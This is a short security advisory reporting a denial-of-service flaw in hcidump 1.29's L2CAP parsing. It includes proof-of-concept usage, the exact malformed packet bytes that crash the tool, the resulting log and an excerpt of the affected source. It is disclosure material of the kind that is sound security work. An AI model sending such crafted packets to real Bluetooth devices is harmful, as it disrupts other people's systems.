[ Secuobs - Advisory ] Bluetooth : DoS on hcidump 1.29 + PoC



[Software affected] hcidump

[Version] 1.29 (may be other)

[Impact] Denial of Service (may be more)

[Credits] Pierre Betouin - pierre.betouin@xxxxxxxxxxxx - Bug found with BSS v0.6 GPL fuzzer (Bluetooh Stack Smasher)

BSS could be downloaded on http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] was notified

[Original advisory]

http://www.secuobs.com/news/05022006-bluetooth9.shtml#english
http://www.secuobs.com/news/05022006-bluetooth9.shtml#french

[PoC] download it on http://www.secuobs.com/news/05022006-bluetooth8.shtml

[PoC usage]

# ./hcidump-crash 00:80:09:XX:XX:XX
L2CAP packet sent (15)
Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41

# hcidump
HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13

HCI Event: Command Status (0x0f) plen 4
HCI Event: Connect Complete (0x03) plen 11

< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
L2CAP(s): debug : code=8
Echo req: dlen 12
L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
(...)
L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
segmentation fault

[Affected code location] l2cap.c

[Affected code]

while (frm->len >= L2CAP_CMD_HDR_SIZE) {
if (!p_filter(FILT_L2CAP)) {
p_indent(level, frm);
printf("L2CAP(s): ");
}

switch (hdr->code) {
l2cap_cmd_hdr *hdr = frm->ptr;
frm->ptr += L2CAP_CMD_HDR_SIZE;
frm->len -= L2CAP_CMD_HDR_SIZE;
(...)
default:
if (p_filter(FILT_L2CAP))
break;
printf("code 0x%2.2x ident %d len %d\n",
hdr->code, hdr->ident, btohs(hdr->len));
raw_dump(level, frm);
}
frm->ptr += btohs(hdr->len);
frm->len -= btohs(hdr->len);



Relevant Pages